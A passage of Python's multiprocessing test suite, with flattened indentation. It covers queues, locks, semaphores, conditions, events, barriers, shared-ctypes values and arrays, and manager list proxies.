((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
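# Not every queue flavour implements empty() and full(), so fall back to
# comparing qsize() against the expected size when they are missing.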
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
        # the values may be in the buffer but not yet in the pipe, so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
        # note that at this point the items may only be buffered, so the
        # process cannot shut down until the feeder thread has finished
        # pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
                # qsize is not available on all platforms as it
                # relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
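# Tests for the synchronization primitives: Lock, RLock, Semaphore,
# BoundedSemaphore, Condition and Event.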
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
        # Currently fails on macOS
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
        # a further notify should not wake anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
            result = cond.wait_for(lambda: state.value == 4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
            result = cond.wait_for(lambda: state.value == 0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
            result = cond.wait_for(lambda: state.value == 4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
        # Note: threading.Event historically spelled is_set() as isSet();
        # the two APIs now agree, so we can assert on is_set() directly.
        self.assertEqual(event.is_set(), False)
        # Both threading.Event.wait() and the semaphore-backed
        # multiprocessing Event return the flag value rather than None.
        self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
    A bunch of threads or processes, depending on the namespace.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
        Construct a bunch of `n` workers running the same function `f`.
        If `wait_before_exit` is True, the workers won't terminate until
        do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
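# Picklable callable used as the Barrier 'action' callback in the tests
# below; each call appends to the wrapped list.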
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
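# Tests for shared ctypes: Value/RawValue and Array/RawArray.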
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
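# Tests for the list/dict/Namespace proxies provided by managers.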
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
